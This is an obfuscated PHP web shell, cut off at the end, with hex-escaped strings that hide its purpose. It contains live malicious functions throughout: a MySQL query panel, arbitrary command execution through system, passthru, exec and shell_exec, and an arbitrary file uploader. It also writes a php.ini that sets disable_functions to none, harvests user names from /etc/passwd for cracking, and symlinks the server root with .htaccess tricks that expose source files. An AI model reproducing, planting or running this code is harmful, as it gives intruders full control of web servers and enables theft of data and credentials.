\x3c/f\x6fn\x74>\n\t\x3c\x73tron\x67>\n\t<inp\x75\x74 ty\x70\x65=\"\x72\x61\x64\x69o\x22\x20\x6ea\x6de=\x22\x74\x79\x70e\x22 \x76a\x6c\x75e=\"\x70\x61ssw\x64\"\x20\x63lass=\"\x73\x74y\x6c\x65\x33\">\x3c/stron\x67>\x3cspa\x6e\x20clas\x73=\x22\x73\x74\x79\x6c\x65\x33\"><\x73\x74r\x6fng>\n\t</\x73tro\x6eg\x3e\n\t\x3c/s\x70\x61n\x3e\n\x20\x20  </td\x3e\n \x20\x20\x20\x3c/\x74\x72\x3e\n\x20\x20 \x20<tr\x3e\n  \x20\x20\x3c\x74d v\x61\x6cig\x6e\x3d\x22\x74op\" \x62\x67colo\x72\x3d\x22\x231\x3515\x31\x35\"\x20sty\x6ce=\"\x77\x69dth: \x31\x33\x39\x70x\x22\x3e</t\x64\x3e\n \x20\x20 \x3ct\x64\x20\x76a\x6ci\x67n=\"t\x6fp\" \x62gcol\x6fr=\"\x23\x315\x31\x3515\" \x63\x6fl\x73\x70a\x6e=\x22\x35\x22\x3e\x3cs\x74rong\x3e\x3ci\x6ep\x75t type\x3d\x22\x73ubm\x69t\x22\x20value=\x22\x73t\x61\x72t\">\n   \x20</\x73tro\x6e\x67\x3e\n\x20 \x20\x20</\x74\x64>\n\x20\x20  \x3c\x74\x72>\n\x3c/f\x6f\x72\x6d\x3e  \x20\x20\n    \n\x20   \x3c\x74\x64\x20\x76al\x69g\x6e\x3d\x22t\x6fp\"\x20\x63ol\x73pa\x6e\x3d\x226\x22><\x73\x74\x72\x6fng\x3e\x3c/s\x74\x72ong></\x74d>\n\n<\x66\x6fr\x6d m\x65t\x68od\x3d\"\x50\x4f\x53\x54\"\x20\x74ar\x67et=\"_bl\x61n\x6b\">\n\x3c\x73\x74\x72o\x6eg>\n\x3c\x69\x6e\x70\x75t\x20\x74yp\x65=\"h\x69d\x64\x65n\x22\x20\x6eam\x65\x3d\x22\x67\x6f\x22\x20\x76\x61l\x75e\x3d\x22c\x6dd\x5fmysql\">\n\x20\x20\x20 \t</str\x6f\x6eg>\n \x20\x20\x20\t<tr\x3e\n    \x3ct\x64 \x76\x61\x6c\x69\x67\x6e\x3d\x22\x74\x6f\x70\x22 bgcol\x6fr=\x22\x23\x31515\x31\x35\x22\x20\x63lass=\x22styl\x651\x22 c\x6fl\x73pa\x6e\x3d\x22\x36\x22>\x3c\x73\x74\x72on\x67>\x43M\x44\x20MY\x53\x51\x4c</\x73\x74\x72o\x6e\x67>\x3c/td\x3e\n\x20 \x20 \t\t\t\t\x3c/tr\x3e\n \x20 \x20\t<tr>\n \x20\x20 \x3ct\x64 \x76a\x6ci\x67n=\"\x74\x6fp\x22 \x62gc\x6f\x6co\x72=\"\x23\x31\x351\x3515\x22\x20\x73ty\x6ce\x3d\x22\x77\x69\x64\x74h: \x31\x339\x70x\x22><s\x74rong>\x75\x73\x65\x72\x3c/st\x72o\x6e\x67\x3e\x3c/\x74\x64>\n   \x20\x3c\x74\x64\x20v\x61\x6cign\x3d\x22\x74\x6fp\" \x62g\x63o\x6co\x72\x3d\x22\x231\x351515\x22>\x3cst\x72o\x6e\x67><\x69\x6epu\x74 \x6eame\x3d\"\x6d\x79s\x71l_\x6c\" type=\"\x74\x65\x78t\"></\x73\x74\x72\x6fn\x67\x3e\x3c/\x74\x64\x3e\n\x20 \x20 <\x74d\x20\x76\x61l\x69g\x6e\x3d\"to\x70\x22 bgco\x6cor\x3d\"#1\x3515\x31\x35\"\x3e<\x73tro\x6eg>\x70ass</\x73\x74\x72o\x6e\x67>\x3c/t\x64>\n \x20\x20\x20<\x74\x64 val\x69g\x6e\x3d\"\x74\x6f\x70\x22\x20\x62\x67c\x6f\x6c\x6f\x72\x3d\"#\x3151\x35\x315\x22\x3e\x3cs\x74\x72\x6f\x6e\x67>\x3ci\x6e\x70u\x74\x20\x6ea\x6d\x65\x3d\"mysq\x6c_\x70\"\x20t\x79\x70\x65=\x22\x74ext\x22></\x73t\x72\x6f\x6e\x67>\x3c/td>\n\x20 \x20 <t\x64\x20va\x6c\x69g\x6e\x3d\"\x74o\x70\x22 b\x67\x63ol\x6fr=\x22\x231\x35\x31\x3515\x22\x3e<str\x6fng\x3e\x64a\x74\x61\x62a\x73\x65\x3c/\x73\x74\x72ong></\x74\x64>\n \x20\x20\x20\x3c\x74d \x76\x61\x6ci\x67\x6e\x3d\x22t\x6fp\x22\x20\x62\x67co\x6c\x6fr=\"\x231\x3515\x31\x35\x22>\x3cst\x72ong\x3e\x3c\x69\x6e\x70\x75\x74\x20na\x6de=\"\x6dy\x73ql_\x64b\" \x74\x79pe\x3d\x22\x74\x65xt\x22>\x3c/\x73\x74\x72o\x6e\x67\x3e\x3c/t\x64\x3e\n \x20\x20\x20\t\t\t\t</tr\x3e\n\t\t\t\t\t<\x74\x72>\n \x20 \x20<td va\x6c\x69\x67n\x3d\"top\" b\x67\x63o\x6co\x72\x3d\"\x23\x31\x351\x35\x31\x35\" s\x74yle=\x22he\x69g\x68\x74: 2\x35\x70x; \x77i\x64\x74\x68:\x20\x31\x33\x39p\x78;\x22>\n\t\x3cs\x74\x72on\x67\x3ecmd\x20\x7e</\x73t\x72\x6fng></td\x3e\n   \x20\x3ctd \x76\x61l\x69gn\x3d\"\x74op\" bg\x63o\x6cor=\"#1\x3515\x31\x35\" col\x73p\x61n=\"5\x22\x20s\x74\x79l\x65=\x22heig\x68\x74: \x325p\x78\x22\x3e\n\t<\x73t\x72\x6fn\x67>\n\t\x3ct\x65\x78\x74are\x61 na\x6d\x65=\"d\x62\x5fq\x75e\x72\x79\x22\x20\x73\x74yle=\"\x77idth: \x335\x33\x70x\x3b \x68e\x69ght: 8\x39px\"\x3e\x53H\x4f\x57\x20DATA\x42ASE\x53\x3b\nS\x48\x4fW TA\x42LE\x53\x20\x75\x73\x65\x72_v\x62\x20;\nSELE\x43T * \x46\x52\x4f\x4d u\x73\x65\x72;\nSE\x4cE\x43\x54 v\x65\x72sio\x6e()\x3b\nS\x45\x4cE\x43\x54 u\x73e\x72()\x3b</\x74\x65\x78t\x61r\x65a\x3e\x3c/s\x74ron\x67\x3e\x3c/\x74d>\n   \x20\t\x3c/t\x72\x3e\n\t\t<t\x72>\n \x20  \x3c\x74\x64 v\x61\x6cign\x3d\x22\x74\x6f\x70\"\x20b\x67c\x6flo\x72\x3d\x22\x23\x31\x35\x31\x3515\x22 s\x74yl\x65\x3d\"\x77\x69d\x74\x68:\x20\x313\x39px\x22\x3e<strong>\x3c/\x73\x74r\x6fng>\x3c/t\x64\x3e\n\x20\x20 \x20<t\x64\x20\x76\x61\x6c\x69g\x6e=\"t\x6fp\"\x20\x62\x67\x63\x6fl\x6fr=\"#15\x315\x315\x22\x20\x63o\x6csp\x61\x6e\x3d\x22\x35\"\x3e<stron\x67\x3e<\x69\x6e\x70u\x74 \x74ype=\x22s\x75\x62mit\x22\x20val\x75e\x3d\"run\">\x3c/\x73\x74ro\x6e\x67></\x74d\x3e\n    \t\x3c/t\x72\x3e\n\x3c\x69\x6ep\x75\x74\x20\x6e\x61\x6d\x65=\x22db\x22 \x76al\x75e\x3d\x22M\x79\x53Q\x4c\" t\x79\x70\x65\x3d\"\x68\x69\x64\x64e\x6e\x22\x3e\n<\x69n\x70ut\x20\x6eam\x65=\x22d\x62\x5f\x73er\x76\x65r\"\x20type=\"\x68\x69dd\x65n\" v\x61lue=\x22\x6c\x6fc\x61\x6c\x68\x6fs\x74\x22>\n<i\x6ep\x75t \x6e\x61\x6d\x65=\"\x64\x62_po\x72t\x22\x20\x74\x79\x70\x65=\x22hid\x64\x65\x6e\" \x76\x61\x6cu\x65=\x22\x33\x33\x30\x36\x22\x3e\n<input\x20\x6ea\x6d\x65\x3d\"\x63cc\x63\x22 t\x79\x70e\x3d\x22h\x69\x64\x64en\x22\x20va\x6cue\x3d\"d\x62\x5f\x71\x75\x65r\x79\"\x3e\n\x20\x20 \x20\t\n\x3c/\x66o\x72m>  \x20\x20\t\n\t\t\x3ctr\x3e\n\x20\x20 \x20\x3c\x74d\x20va\x6ci\x67\x6e\x3d\"top\x22\x20bg\x63olor\x3d\"\x23\x315\x31\x351\x35\"\x20\x63\x6fls\x70an=\"6\x22><\x73\x74\x72\x6fn\x67\x3e\x3c/stro\x6eg\x3e</td>\n\n\n\t\t\x3c/t\x72>\n\t\t\n\x3c\x66\x6fr\x6d \x6d\x65tho\x64=\"P\x4f\x53T\x22 \x74ar\x67e\x74\x3d\x22_\x62\x6ca\x6e\x6b\">\n\t\t\x3c\x74r>\n  \x20\x20<\x74d\x20va\x6cign=\x22\x74\x6fp\x22\x20bgc\x6f\x6co\x72=\"#15\x3151\x35\x22\x20\x63l\x61s\x73=\"s\x74\x79le1\"\x20\x63ol\x73\x70\x61n\x3d\x22\x36\x22\x3e<stro\x6e\x67>CMD\x20\n\ts\x79st\x65\x6d\x20- \x70\x61\x73\x73thru\x20-\x20e\x78\x65\x63\x20- shel\x6c\x5f\x65x\x65\x63</\x73tr\x6f\x6eg\x3e</t\x64>\n\x20  \x20\t\t\t\t</tr\x3e\n\t\t<tr\x3e\n \x20 \x20<\x74d\x20vali\x67\x6e\x3d\x22\x74\x6f\x70\"\x20b\x67c\x6f\x6co\x72\x3d\x22\x231515\x315\" \x73\x74y\x6c\x65=\"wi\x64\x74h: 139p\x78\x22>\x3c\x73\x74r\x6fn\x67\x3eC\x4d\x44\x20\x7e</\x73\x74ro\x6eg></t\x64\x3e\n \x20  \x3c\x74d va\x6cig\x6e=\"top\x22 b\x67\x63\x6f\x6c\x6f\x72\x3d\x22\x231515\x315\"\x20\x63\x6fl\x73\x70\x61n=\"\x35\x22>\n\t\t\t\t\t\x3c\x73\x65lec\x74\x20na\x6de\x3d\"at\x74\x22\x20\x64\x69r=\x22\x72\x74l\"\x20\x20s\x69z\x65=\"\x31\">\n";if($_POST["a\x74\x74"]==null){echo"\t\t\t\t\t\t<op\x74\x69o\x6e valu\x65=\"\x73\x79\x73t\x65m\x22 s\x65l\x65c\x74\x65\x64=\"\x22\x3e\x73\x79\x73tem\x3c/o\x70\x74\x69\x6f\x6e\x3e";}else{echo"\t\t\t\t\t\t\x3c\x6f\x70tion\x20\x76\x61lu\x65=\x27$_POST[att]\x27\x20\x73e\x6cect\x65d=\x27\x27\x3e$_POST[att]\x3c/o\x70t\x69o\x6e>\n\t\t\t\t\t\t\x3c\x6f\x70t\x69o\x6e\x20\x76a\x6cue\x3d\x73\x79s\x74\x65\x6d>\x73y\x73te\x6d\x3c/\x6fptio\x6e\x3e\n";}echo "\n\t\t\t\t\t\t<o\x70\x74\x69o\x6e val\x75\x65\x3d\"\x70a\x73\x73thr\x75\x22>\x70a\x73s\x74h\x72u\x3c/opti\x6fn\x3e\n\t\t\t\t\t\t\x3cop\x74i\x6f\x6e value=\"exec\">\x65xec\x3c/\x6f\x70\x74\x69\x6fn\x3e\n\t\t\t\t\t\t<op\x74i\x6fn\x20\x76al\x75\x65=\"\x73he\x6c\x6c\x5fe\x78ec\"\x3esh\x65\x6c\x6c\x5f\x65x\x65\x63</opti\x6fn\x3e\n\t\t\t\t\t</\x73e\x6c\x65c\x74\x3e    \n   \x20<\x73tron\x67>\n<\x69np\x75t\x20\x6eam\x65\x3d\"\x70\x61ge\" t\x79p\x65=\"h\x69d\x64e\x6e\x22 va\x6c\x75e\x3d\x22c\x63\x6d\x6d\x64d\x22>\x20 \x20 \n\t<i\x6e\x70\x75t\x20n\x61\x6d\x65=\"ccm\x6ddd\x32\"\x20\x74\x79p\x65=\x22\x74\x65x\x74\" \x73\x74\x79\x6ce\x3d\"\x77idt\x68:\x2028\x34px\x22\x20\x76a\x6c\x75e=\"ls -\x6c\x61\"\x3e\x3c/\x73\x74\x72o\x6eg>\x3c/td\x3e\n  \x20 \t\x3c/t\x72\x3e\n\t\t\x3ct\x72\x3e\n\x20  \x20\x3ct\x64 v\x61\x6ci\x67n=\x22t\x6f\x70\"\x20\x62\x67c\x6f\x6cor\x3d\x22#1\x351\x35\x315\"\x20s\x74\x79\x6c\x65\x3d\x22\x77id\x74\x68:\x20\x31\x339px\"\x3e<\x73tro\x6eg></\x73tr\x6f\x6eg></td>\n  \x20 <t\x64\x20\x76\x61l\x69\x67n\x3d\"top\" bgco\x6co\x72=\"#15151\x35\x22 col\x73\x70\x61n\x3d\x225\">\x3c\x73\x74r\x6fng\x3e\x3c\x69np\x75\x74 \x74yp\x65=\"\x73\x75bmit\"\x20v\x61\x6cue\x3d\"\x67\x6f\x22></\x73t\x72o\x6eg></td\x3e\n\x20\x20\x20 \t</\x74r>\n\x3c/\x66\x6f\x72m>\x20 \x20\x20\t    \t\n\n<\x66\x6fr\x6d \x6de\x74\x68\x6fd=\"POS\x54\x22 \x74arg\x65\x74\x3d\x22\x5f\x62\x6c\x61\x6ek\">\n\n\t\t<tr>\n\x20   \x3c\x74\x64\x20\x76a\x6c\x69\x67n=\"\x74\x6f\x70\"\x20bg\x63\x6f\x6c\x6fr\x3d\x22\x23\x315\x31\x35\x315\x22\x20cl\x61\x73s=\"s\x74yle1\" c\x6f\x6c\x73\x70an=\"6\">\x3c\x73\x74\x72o\x6e\x67\x3eSho\x77 \n\t\x46ile\x20\x41n\x64 E\x64\x69t\x3c/s\x74ron\x67\x3e</\x74d>\n\x20  \x20\t\t\t\t</tr>\n\t\t\x3ct\x72>\n\x20 \x20\x20\x3ct\x64 \x76\x61\x6c\x69g\x6e=\x22\x74o\x70\" b\x67co\x6co\x72=\"#1\x351\x351\x35\" \x73t\x79\x6c\x65\x3d\x22wi\x64\x74\x68:\x20\x31\x33\x39\x70\x78\"\x3e\x3c\x73\x74ron\x67>\x50\x61th \x7e\x3c/\x73\x74r\x6f\x6e\x67\x3e\x3c/\x74\x64\x3e\n \x20 \x20<\x74\x64 \x76a\x6c\x69\x67\x6e=\"\x74op\"\x20\x62gc\x6flor=\"\x2315\x31\x351\x35\x22\x20colsp\x61n=\x225\x22>\n\t<\x73\x74\x72\x6fng\x3e\n\t\x3ci\x6e\x70ut n\x61\x6d\x65\x3d\x22\x70\x61t\x68class\x22 t\x79\x70e=\"t\x65\x78t\x22 \x73t\x79le\x3d\x22\x77\x69\x64\x74h:\x20\x3284p\x78\" valu\x65\x3d\x22";echo realpath("");echo "\"\x3e</\x73\x74\x72\x6fn\x67\x3e</td\x3e\n\x20\x20  \t</\x74r\x3e\n\t\t<t\x72>\n   \x20\x3c\x74\x64\x20v\x61\x6ci\x67\x6e=\"top\x22 b\x67c\x6flor=\"\x23\x31\x35\x315\x315\" \x73ty\x6ce\x3d\x22\x77i\x64th: 1\x339px\"\x3e<s\x74\x72\x6fng></s\x74r\x6fn\x67\x3e\x3c/td\x3e\n\x20\x20\x20 <t\x64\x20va\x6ci\x67n\x3d\"top\"\x20\x62g\x63\x6f\x6cor=\x22\x231515\x31\x35\"\x20\x63olsp\x61\x6e\x3d\x225\">\x3c\x73\x74r\x6f\x6e\x67><in\x70\x75t\x20\x74y\x70e\x3d\"\x73\x75b\x6d\x69\x74\" v\x61l\x75\x65\x3d\x22\x73h\x6fw\">\x3c/st\x72o\x6e\x67\x3e\x3c/\x74\x64\x3e\n\x20\x20 \x20\t\t\t\t\x3c/t\x72\x3e\n\x3ci\x6epu\x74 na\x6de\x3d\"pa\x67\x65\" t\x79\x70\x65=\x22\x68\x69d\x64\x65\x6e\"\x20\x76\x61lu\x65\x3d\"sh\x6f\x77\x22> \x20\x20  \x20 \x20\t\t\t\t\n\x3c/\x66\x6f\x72m\x3e\x20   \t\t\t\t\n\t\t\t\t\t\x3c\x74\x72\x3e\n\x20  \x20<t\x64 \x76al\x69gn=\"\x74o\x70\" b\x67\x63o\x6c\x6fr\x3d\x22#\x31\x35\x31\x3515\"\x20cl\x61ss\x3d\x22sty\x6c\x651\"\x20c\x6fl\x73p\x61n\x3d\"6\x22\x3e<\x73tron\x67\x3eIn\x66\x6f\x20\n\t\x53\x65c\x75r\x69\x74y\x3c/s\x74\x72ong\x3e</t\x64\x3e\n   \x20\t\t\t\t</t\x72>\n \x20 \x20\t<\x74\x72>\n\x20 \x20 \x3c\x74\x64\x20\x76a\x6c\x69g\x6e\x3d\"\x74op\" b\x67c\x6fl\x6f\x72\x3d\x22\x23\x31\x351\x35\x31\x35\"\x20\x73\x74yl\x65=\x22width:\x201\x339\x70\x78\x22><\x73t\x72on\x67\x3e\x53\x61\x66e\x20M\x6fde\x3c/stro\x6eg\x3e\x3c/\x74\x64\x3e\n\x20\x20\x20 \x3ct\x64 \x76\x61l\x69\x67\x6e\x3d\"\x74o\x70\x22\x20b\x67\x63o\x6co\x72=\x22\x23151\x351\x35\x22 \x63\x6f\x6csp\x61\x6e\x3d\"5\">\n\t\x3c\x73\x74ro\x6eg\x3e\n";${${"\x47L\x4f\x42\x41\x4c\x53"}["r\x73hf\x72\x65s\x6c\x68\x6d\x78"]}=ini_get("sa\x66e_mode");if(${${"\x47\x4c\x4fB\x41LS"}["\x6djj\x6as\x79\x63"]}=="1"){echo"\x4fN";}else{echo"\x4fFF";}echo "\t\n\t</\x73t\x72\x6f\x6eg\x3e\t\n\t</\x74\x64\x3e\n \x20 \x20\t\t\t\t\x3c/\x74\x72>\n   \x20<\x74\x72\x3e\n\x20\x20\x20\x20\x3ct\x64\x20\x76a\x6cign\x3d\"t\x6fp\x22 \x62gcol\x6fr=\"\x23\x315\x315\x31\x35\"\x20\x73\x74\x79l\x65=\x22\x77idth: \x31\x339p\x78\">\x3c\x73tro\x6e\x67\x3eUnam\x65</\x73\x74\x72o\x6eg\x3e</\x74d\x3e\n  \x20\x20<\x74\x64\x20v\x61\x6ci\x67\x6e\x3d\"top\"\x20bgcol\x6fr=\x22#\x31\x351515\" c\x6fl\x73\x70\x61\x6e\x3d\"\x35\"\x3e\n\t<\x73\x74ro\x6eg\x3e\n";echo"<\x66o\x6e\x74\x20fa\x63e=\x22V\x65\x72\x64\x61\x6ea\x22 s\x69\x7ae=\x22\x32\">\n\n".php_uname()."\n\n";echo "\x3c/\x73\x74ro\x6eg\x3e\x3c/td>\x3c/\x74\x72\x3e\x3ctr>\n  \x20 \x3ct\x64\x20\x76\x61\x6c\x69g\x6e=\x22\x74\x6f\x70\x22\x20\x62\x67\x63\x6flo\x72\x3d\x22\x23\x31\x351515\x22 s\x74\x79le\x3d\x22\x77i\x64\x74\x68:\x20\x313\x39\x70x\"><stro\x6e\x67>\x54\x6f\x6f\x6cs</\x73\x74\x72o\x6eg></\x74\x64>\n\x20\x20\x20\x20\x3ctd v\x61\x6c\x69gn=\"\x74\x6fp\x22 \x62\x67c\x6flo\x72=\x22#\x31\x351\x3515\" \x63\x6f\x6c\x73p\x61\x6e\x3d\"\x35\">\n\t<s\x74\x72\x6f\x6eg\x3e\n";echo"<\x63e\x6et\x65\x72>\x3c\x66o\x72\x6d\x20\x61c\x74\x69o\x6e\x3d\x22\x22 \x6d\x65\x74\x68\x6fd\x3d\"\x70o\x73\x74\x22\x20\x65\x6e\x63t\x79p\x65=\x22mul\x74\x69\x70\x61\x72\x74/\x66o\x72m-\x64ata\x22 n\x61\x6de\x3d\"u\x70\x6co\x61de\x72\" \x69\x64\x3d\x22\x75p\x6c\x6f\x61\x64er\">";echo"\x3c\x63\x65n\x74e\x72>\x3ci\x6ep\x75\x74\x20\x74y\x70e=\"\x66i\x6c\x65\x22\x20n\x61\x6de\x3d\x22fi\x6c\x65\" \x73\x69\x7ae\x3d\x22\x350\"\x3e\x3c\x69\x6epu\x74 \x6e\x61me\x3d\"_\x75\x70\x6c\" \x74yp\x65=\x22\x73\x75b\x6d\x69t\" i\x64=\x22\x5f\x75\x70\x6c\"\x20va\x6c\x75\x65=\x22\x55plo\x61\x64\x22>\x3c/\x66\x6f\x72\x6d\x3e</ce\x6et\x65\x72\x3e";if($_POST["\x5fu\x70\x6c"]=="Upl\x6f\x61\x64"){if(@copy($_FILES["f\x69l\x65"]["\x74m\x70\x5fnam\x65"],$_FILES["fil\x65"]["n\x61m\x65"])){echo"\x3cp \x61\x6c\x69g\x6e\x3d\x22\x63\x65\x6et\x65\x72\"\x3e\x3c\x66o\x6e\x74 \x66\x61\x63e\x3d\x22V\x65r\x64a\x6e\x61\x22\x20\x73\x69ze\x3d\"\x31\"\x3e\x3c\x66ont\x20\x63\x6f\x6co\x72\x3d\"white\x22> D\x6f\x6ee\x20\x21 </\x66\x6f\x6e\x74><\x62r\x3e";}else{echo"\x3cfo\x6et\x20c\x6fl\x6fr\x3d\"\x23\x46\x46000\x30\x22>\x46a\x69le\x64 \x21 \x3c/\x66ont></\x70>\n\n";}}echo "\x3chr\x20co\x6c\x6f\x72=\x6c\x69\x6de>\n#\x50\x72\x6fc\x6f\x64\x65rz \x54\x65a\x6d\x20A\x6cban\x69a -\x201337\x770r\x6d &co\x70y\x3b Ret\x6e\x4fH\x61cK 2\x301\x33\n\x3c/\x73\x74r\x6f\x6eg\x3e</t\x64>\n</\x74e\x78\x74\x61\x72\x65a>\n<c\x65\x6e\x74er>\n\x3cf\x6f\x72m met\x68\x6fd=\x70\x6f\x73t>\x3c\x69np\x75t t\x79\x70\x65\x3d\x73\x75\x62\x6di\x74 \x6eame\x3din\x69 \x76\x61lu\x65=\x22\x50H\x50\x2e\x49\x4e\x49\x22 /\x3e\n\x3c\x66orm \x6det\x68od=\x70\x6f\x73\x74><\x69npu\x74 t\x79p\x65\x3d\x73\x75bm\x69\x74 na\x6d\x65=\x22u\x73re\" v\x61\x6cu\x65\x3d\"C\x52\x41C\x4bER\" />\x3c/\x66\x6frm></form>\n\t";if(isset($_POST["i\x6ei"])){${"\x47\x4cOBA\x4c\x53"}["\x6c\x77\x76f\x6d\x6f"]="l\x69nk";${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x75\x75oe\x6c\x64\x6c\x68\x6e"]}=fopen("p\x68\x70\x2e\x69\x6ei","w");${"\x47\x4c\x4fBA\x4c\x53"}["\x70\x72\x75d\x68\x72st\x6a"]="\x72";$xckdbydgd="\x72\x72";${${"G\x4cOB\x41L\x53"}["lg\x63\x6dk\x6bj"]}=" \x64\x69sb\x61\x6c\x65_\x66un\x63ti\x6f\x6es\x3d\x6e\x6fn\x65 ";fwrite(${${"\x47\x4cOBA\x4cS"}["p\x72u\x64\x68rstj"]},${$xckdbydgd});${${"\x47L\x4f\x42A\x4c\x53"}["nfd\x6e\x69y\x65"]}="\x3c\x62\x72>\x3ca href\x3d\x70\x68p\x2ein\x69>\x3cf\x6f\x6e\x74 \x63\x6f\x6c\x6f\x72=whi\x74e \x73\x69z\x65\x3d2\x20\x66ace\x3d\"\x54AHO\x4dA\x22\x3e<u\x3e\x3c\x66\x6f\x6e\x74\x20\x63ol\x6f\x72\x3dred>D\x4fNE</fon\x74> \x4f\x70en\x20\x74\x68\x69s link \x69n\x20ne\x77 ta\x62 to\x20r\x75n\x20P\x48\x50\x2eIN\x49</\x75\x3e</fon\x74\x3e\x3c/a\x3e";echo${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x6c\x77\x76f\x6d\x6f"]};}if(isset($_POST["u\x73re"])){${"\x47\x4cO\x42\x41\x4cS"}["\x79\x66\x77\x72yi\x6e"]="\x75se\x72";echo "\x3cfor\x6d\x20m\x65\x74\x68\x6fd=\x70\x6f\x73\x74>\n\t<\x74e\x78ta\x72e\x61\x20\x72ow\x73\x3d10 co\x6c\x73=\x350\x20\x6e\x61\x6de=user>";${${"G\x4cO\x42\x41L\x53"}["o\x74m\x76wuy\x72"]}=file("/\x65tc/p\x61\x73\x73\x77\x64");foreach(${${"\x47\x4cOBA\x4c\x53"}["\x6f\x74\x6d\x76w\x75\x79\x72"]} as${${"\x47\x4c\x4fB\x41\x4cS"}["\x79\x66\x77\x72y\x69\x6e"]}){${"G\x4cO\x42\x41\x4c\x53"}["\x6e\x6epeh\x6as"]="s\x74\x72";${"G\x4c\x4f\x42AL\x53"}["\x62\x6e\x62\x6ew\x6at\x66y\x6e\x77"]="u\x73\x65\x72";${"GLO\x42\x41L\x53"}["\x68\x62b\x75\x7a\x74\x65\x6ep\x74"]="\x73\x74\x72";${${"\x47\x4cO\x42\x41L\x53"}["\x6e\x6e\x70\x65h\x6a\x73"]}=explode(":",${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["b\x6e\x62nw\x6a\x74f\x79n\x77"]});echo${${"\x47L\x4f\x42\x41\x4c\x53"}["\x68\x62\x62u\x7at\x65\x6ept"]}[0]."\n";}echo "</\x74e\x78t\x61r\x65\x61>\x3c\x62r\x3e<\x62r\x3e\n\t\x3c\x69nput\x20\x74y\x70\x65\x3d\x73\x75bmi\x74\x20\x6ea\x6d\x65=s\x75\x20\x76\x61\x6cue\x3d\"S\x74\x61r\x74\x20\x43r\x61c\x6b\x69\x6e\x67\"\x20/\x3e\x3c/\x66or\x6d>\n\t";}echo "\t";error_reporting(0);echo"<fon\x74 \x63\x6flo\x72\x3d\x72ed \x73\x69ze\x3d\x32\x20\x66a\x63e\x3d\x22TAH\x4f\x4dA\x22>";if(isset($_POST["s\x75"])){mkdir("\x62t",0777);$mifgqnmh="\x67";${"GL\x4fB\x41\x4c\x53"}["\x63\x6e\x6be\x63\x71\x62\x6d\x79\x67c"]="\x75\x73\x72";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6e\x76\x6aup\x63i\x79x\x62"]="r\x72";${"\x47\x4c\x4fB\x41\x4cS"}["m\x76\x76ipt\x69\x70ay"]="\x62t";${"\x47\x4cOBA\x4c\x53"}["\x79\x64v\x62\x76x\x73\x76"]="f";${${"\x47\x4cOB\x41L\x53"}["n\x76\x6au\x70\x63i\x79\x78\x62"]}="\x20O\x70tio\x6es \x61\x6cl \n D\x69rec\x74o\x72\x79I\x6ede\x78\x20\x53\x75x.h\x74\x6dl \n\x20\x41d\x64\x54\x79\x70\x65\x20\x74\x65xt/\x70l\x61\x69\x6e\x20.\x70\x68p \n Add\x48\x61\x6ed\x6c\x65r\x20se\x72\x76er-par\x73e\x64\x20\x2e\x70\x68\x70 \n\x20\x20\x41\x64d\x54yp\x65\x20\x74\x65\x78t/pl\x61i\x6e\x20\x2ehtml \n A\x64d\x48\x61\x6e\x64\x6c\x65r \x74\x78t\x20.h\x74\x6d\x6c\x20\n\x20\x52\x65\x71\x75ir\x65 Non\x65\x20\n\x20Satisf\x79\x20A\x6ey";${${"G\x4c\x4f\x42A\x4c\x53"}["\x73\x61f\x73\x6e\x73\x70t\x71"]}=fopen("\x62\x74/.\x68\x74\x61\x63\x63e\x73\x73","\x77");$dlgbewtnr="c\x6fnfi\x67\x75\x72\x61\x74\x69on";$jxften="r\x72";fwrite(${$mifgqnmh},${$jxften});${"\x47\x4c\x4f\x42\x41L\x53"}["\x77\x75\x67\x76z\x79yt"]="\x75sr";${${"\x47\x4c\x4fB\x41\x4cS"}["\x6d\x76\x76\x69ptip\x61\x79"]}=symlink("/","\x62t/\x72\x6f\x6f\x74");${${"\x47\x4cO\x42\x41L\x53"}["\x79\x79xpgt\x69f\x62"]}="\x3cbr><a\x20\x68\x72ef=bt/\x72o\x6ft>\x3cf\x6fn\x74\x20c\x6fl\x6f\x72=w\x68\x69\x74e\x20s\x69z\x65=3\x20fa\x63\x65\x3d\"\x54A\x48\x4fM\x41\"\x3e roo\x74 </fon\x74>\x3c/a\x3e\x3cf\x6f\x6e\x74 \x63\x6flor\x3dr\x65\x64\x20si\x7a\x65=3 face\x3d\x22\x54A\x48\x4fMA\">\x20~ </font>";echo"<\x75\x3e$rt</\x75>";${"\x47\x4c\x4fB\x41LS"}["\x62\x70\x6e\x69\x78\x62\x68\x76w\x62"]="\x66";${${"\x47\x4c\x4f\x42\x41L\x53"}["\x78\x72\x6e\x72q\x6e\x65\x65\x71\x79\x66\x6e"]}=mkdir("\x42\x54",0777);${${"\x47LOB\x41LS"}["uu\x6f\x65\x6cd\x6c\x68n"]}=" \x4fp\x74i\x6fns\x20\x61\x6cl \n\x20\x44ir\x65c\x74\x6f\x72yI\x6e\x64\x65x\x20\x53\x75\x78.\x68\x74\x6d\x6c\x20\n Add\x54yp\x65\x20te\x78t/pl\x61\x69n\x20\x2ephp\x20\n\x20\x41\x64dHa\x6edl\x65r serv\x65r-p\x61\x72\x73ed .p\x68p\x20\n\x20 \x41d\x64Type\x20\x74\x65xt/\x70\x6cain\x20.\x68\x74\x6dl \n\x20Ad\x64Ha\x6ed\x6cer \x74\x78\x74\x20.\x68tm\x6c\x20\n\x20R\x65q\x75\x69\x72\x65 \x4e\x6fn\x65 \n \x53\x61ti\x73\x66\x79\x20A\x6e\x79";${${"\x47\x4c\x4f\x42\x41L\x53"}["\x79\x64\x76\x62vxs\x76"]}=fopen("B\x54/.\x68ta\x63\x63e\x73\x73","\x77");fwrite(${${"\x47L\x4fB\x41\x4c\x53"}["\x62p\x6e\x69\x78\x62\x68\x76\x77\x62"]},${${"GL\x4f\x42\x41\x4c\x53"}["\x75\x75o\x65\x6c\x64l\x68n"]});${"\x47\x4cOB\x41\x4c\x53"}["\x71\x6a\x74\x7ax\x68\x62h\x6a\x69"]="\x75\x73s";${${"\x47\x4c\x4fBA\x4c\x53"}["\x7a\x6e\x6cfc\x67"]}="\x3c\x61 \x68r\x65\x66=\x42\x54/>\x3c\x66o\x6et c\x6f\x6c\x6f\x72\x3d\x77h\x69\x74e si\x7ae=\x33 \x66\x61c\x65=\x22\x54\x41\x48OM\x41\"\x3e\x20 c\x6fnfi\x67\x73 